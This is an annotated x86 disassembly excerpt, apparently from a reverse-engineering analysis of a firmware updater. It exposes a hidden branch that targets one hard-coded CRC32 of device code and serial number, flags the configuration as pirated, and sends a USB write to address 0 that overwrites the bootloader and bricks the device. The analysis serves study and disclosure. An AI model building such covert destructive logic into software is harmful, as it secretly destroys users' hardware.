- ; Excerpt of an IDA listing (x86-32, Intel syntax, stack-passed arguments) from a firmware-update routine.
- ; The function entry (where ebx/esi/edi are pushed) and the remainder of loc_401C7B lie outside this excerpt.
- ; Flow: two chained calls to sub_4629D0 (identified by the analyst as CRC32) over an 8-byte device code and
- ; a 24-byte serial number; the result is compared with ONE hard-coded constant, and on a match an 87-byte
- ; write packet addressed to offset 0 is built and sent with USB_Write, after which the function returns
- ; without performing the normal upgrade. The selection logic is a single compare/branch on the host side;
- ; the meaningful defence is on the device side (a bootloader that refuses raw writes to its own region
- ; or requires an authenticated image), since a write to address 0 overwrites the bootloader itself.
- 00401BF9 push 0FFFFFFFFh; arg2: initial CRC value 0xFFFFFFFF (the conventional CRC32 seed)
- 00401BFB push 8; arg1: length = 8 bytes (device code)
- 00401BFD push offset dword_52EAB4; arg0: pointer to the 8-byte device code
- 00401C02 call sub_4629D0; CRC32 of the device code (routine identified as CRC32 by the analyst); eax = result
- 00401C07 push eax; arg2: seed the second pass with the first result, i.e. one running CRC over both fields
- 00401C08 push 18h; arg1: length = 24 bytes (serial number)
- 00401C0A push offset byte_52EB18; arg0: pointer to the 24-byte serial number
- 00401C0F call sub_4629D0; continue the CRC32 over the serial number
- 00401C14 add esp, 18h; drop both calls' arguments (2 x 3 dwords = 0x18): caller cleans up, so sub_4629D0 is cdecl-style
- 00401C17 cmp eax, 0C8C2F013h ;<<- Here! the single hard-coded CRC32 that selects the brick path (effectively CRC32 of device code || serial number)
- 00401C1C jnz short loc_401C7B ; any other value -> normal upgrade routine; execution falls through only on an exact match
- 00401C1E mov byte_52E96B, 0A5h ; set a flag byte (analyst: marks config.dat as pirated)
- 00401C25 call sub_462470; analyst: writes config.dat (no arguments are pushed for this call)
- 00401C2A mov ecx, [esp+4+arg_0]; ecx = first stack argument (analyst: pointer to the encrypted firmware image)
- 00401C2E mov InBuffer, 0AAh; packet byte 0: command 0xAA (analyst: 'write command')
- 00401C35 mov word_52D862, 50h ; packet length field: 0x50 = 80 payload bytes will be written
- 00401C3E mov byte_52D864, 0 ; 3-byte target address, low byte = 0 (!!! address 0 is where the bootloader sits, per the analyst)
- 00401C45 mov byte_52D865, 0 ; target address, middle byte = 0
- 00401C4C mov byte_52D866, 0 ; target address, high byte = 0
- 00401C53 xor eax, eax; eax = 0, used as the loop index below
- 00401C55
- 00401C55 loc_401C55: ; copy loop: 80 bytes from firmware+0x280 into the packet payload
- 00401C55 mov dl, [ecx+eax+280h]; dl = firmware[0x280 + eax]
- 00401C5C mov byte_52D867[eax], dl; payload[eax] = dl (payload starts right after the 3 address bytes)
- 00401C62 inc eax; eax++
- 00401C63 cmp eax, 50h; compare index with 80
- 00401C66 jb short loc_401C55; loop while eax < 0x50 (unsigned compare, as a length should be)
- ; then hand the packet to the write routine: 80 bytes written at address 0 overwrite the bootloader and brick the device.
- 00401C68 push 57h ; nInBufferSize = 0x57 = 87 (80-byte payload + 7-byte header)
- 00401C6A push offset InBuffer ; lpInBuffer (start of the packet built above)
- 00401C6F call USB_Write; send the write command -- this is the bricking step
- 00401C74 add esp, 8; drop the two USB_Write arguments
- 00401C77 pop edi; restore callee-saved registers; the matching pushes are at the function entry, above this excerpt
- 00401C78 pop esi
- 00401C79 pop ebx
- 00401C7A retn; return to the caller without ever reaching the normal upgrade path
- 00401C7B loc_401C7B: ; normal upgrade routine (CRC did not match); continues past this excerpt
- 00401C7B push ebp
- 00401C7C push offset aReflashingTheF ; "Reflashing the fireware......" (string as stored in the binary)